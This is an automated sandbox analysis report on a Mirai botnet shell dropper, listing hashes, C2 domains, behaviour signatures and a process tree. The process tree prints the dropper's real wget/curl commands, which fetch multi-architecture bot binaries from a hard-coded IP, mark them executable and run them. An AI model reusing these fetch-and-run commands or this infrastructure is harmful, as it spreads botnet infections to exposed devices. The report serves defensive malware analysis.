Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    30-12-2024 02:20

General

  • Target

    6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh

  • Size

    2KB

  • MD5

    0569b09a5951d5fe444efa1892b87687

  • SHA1

    0d3df40a37ec718be33d83c1c9a962e982a51d17

  • SHA256

    6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

  • SHA512

    fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Malware Config

Extracted

Family

mirai

Botnet

CONDI

C2

botnet.tfmobile.store

report.tfmobile.store

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (45299) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 14 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 14 IoCs
  • Modifies Watchdog functionality 1 TTPs 28 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 13 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 14 IoCs
  • Changes its process name 14 IoCs
  • Reads system network configuration 1 TTPs 13 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 24 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh
    /tmp/6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh
    1⤵
    • Writes file to tmp directory
    PID:1496
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:1497
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:1502
    • /bin/cat
      cat botx.x86
      2⤵
        PID:1503
      • /bin/chmod
        chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.x86 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-P6QUmp
        2⤵
        • File and Directory Permissions Modification
        PID:1504
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:1505
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1507
      • /usr/bin/curl
        curl -O http://51.79.141.121/where/botx.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1510
      • /bin/chmod
        chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.mips botx.x86 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-P6QUmp
        2⤵
        • File and Directory Permissions Modification
        PID:1512
      • /tmp/robben
        ./robben Payload
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        PID:1513
      • /usr/bin/wget
        wget http://51.79.141.121/where/botx.x86_64
        2⤵
          PID:1515
        • /usr/bin/curl
          curl -O http://51.79.141.121/where/botx.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1518
        • /bin/chmod
          chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.mips botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-P6QUmp
          2⤵
          • File and Directory Permissions Modification
          PID:1520
        • /tmp/robben
          ./robben Payload
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1521
        • /usr/bin/wget
          wget http://51.79.141.121/where/botx.i468
          2⤵
            PID:1523
          • /usr/bin/curl
            curl -O http://51.79.141.121/where/botx.i468
            2⤵
            • Writes file to tmp directory
            PID:1526
          • /bin/chmod
            chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.i468 botx.mips botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-P6QUmp
            2⤵
            • File and Directory Permissions Modification
            PID:1528
          • /tmp/robben
            ./robben Payload
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            PID:1529
          • /usr/bin/wget
            wget http://51.79.141.121/where/botx.i686
            2⤵
              PID:1533
            • /usr/bin/curl
              curl -O http://51.79.141.121/where/botx.i686
              2⤵
              • Writes file to tmp directory
              PID:1536
            • /bin/chmod
              chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
              2⤵
              • File and Directory Permissions Modification
              PID:1538
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:1539
            • /usr/bin/wget
              wget http://51.79.141.121/where/botx.mpsl
              2⤵
              • Writes file to tmp directory
              PID:1541
            • /usr/bin/curl
              curl -O http://51.79.141.121/where/botx.mpsl
              2⤵
              • Writes file to tmp directory
              PID:1544
            • /bin/chmod
              chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
              2⤵
              • File and Directory Permissions Modification
              PID:1546
            • /tmp/robben
              ./robben Payload
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:1547
            • /usr/bin/wget
              wget http://51.79.141.121/where/botx.arm4
              2⤵
                PID:1549
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm4
                2⤵
                • Writes file to tmp directory
                PID:1552
              • /bin/chmod
                chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                2⤵
                • File and Directory Permissions Modification
                PID:1554
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1555
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm5
                2⤵
                • Writes file to tmp directory
                PID:1557
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm5
                2⤵
                • Writes file to tmp directory
                PID:1560
              • /bin/chmod
                chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                2⤵
                • File and Directory Permissions Modification
                PID:1562
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1563
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm6
                2⤵
                • Writes file to tmp directory
                PID:1565
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm6
                2⤵
                • Writes file to tmp directory
                PID:1568
              • /bin/chmod
                chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                2⤵
                • File and Directory Permissions Modification
                PID:1570
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1571
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.arm7
                2⤵
                • Writes file to tmp directory
                PID:1573
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.arm7
                2⤵
                • Writes file to tmp directory
                PID:1576
              • /bin/chmod
                chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                2⤵
                • File and Directory Permissions Modification
                PID:1578
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1579
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.ppc
                2⤵
                • Writes file to tmp directory
                PID:1581
              • /usr/bin/curl
                curl -O http://51.79.141.121/where/botx.ppc
                2⤵
                • Writes file to tmp directory
                PID:1584
              • /bin/chmod
                chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                2⤵
                • File and Directory Permissions Modification
                PID:1586
              • /tmp/robben
                ./robben Payload
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Writes file to system bin folder
                • Changes its process name
                • Reads system network configuration
                PID:1587
              • /usr/bin/wget
                wget http://51.79.141.121/where/botx.ppc440fp
                2⤵
                  PID:1589
                • /usr/bin/curl
                  curl -O http://51.79.141.121/where/botx.ppc440fp
                  2⤵
                  • Writes file to tmp directory
                  PID:1592
                • /bin/chmod
                  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1594
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  PID:1595
                • /usr/bin/wget
                  wget http://51.79.141.121/where/botx.m68k
                  2⤵
                  • Writes file to tmp directory
                  PID:1597
                • /usr/bin/curl
                  curl -O http://51.79.141.121/where/botx.m68k
                  2⤵
                  • Writes file to tmp directory
                  PID:1600
                • /bin/chmod
                  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1602
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  PID:1603
                • /usr/bin/wget
                  wget http://51.79.141.121/where/botx.sh4
                  2⤵
                  • Writes file to tmp directory
                  PID:1605
                • /usr/bin/curl
                  curl -O http://51.79.141.121/where/botx.sh4
                  2⤵
                  • Writes file to tmp directory
                  PID:1608
                • /bin/chmod
                  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.sh4 botx.x86 botx.x86_64 config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1610
                • /tmp/robben
                  ./robben Payload
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  PID:1611

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/botx.x86

                Filesize

                50KB

                MD5

                1092f7846a6ca7a5e92ece0ea93ff82e

                SHA1

                140fd3e84c49d382e6b0f9a40730d1cd465f8347

                SHA256

                a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

                SHA512

                11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba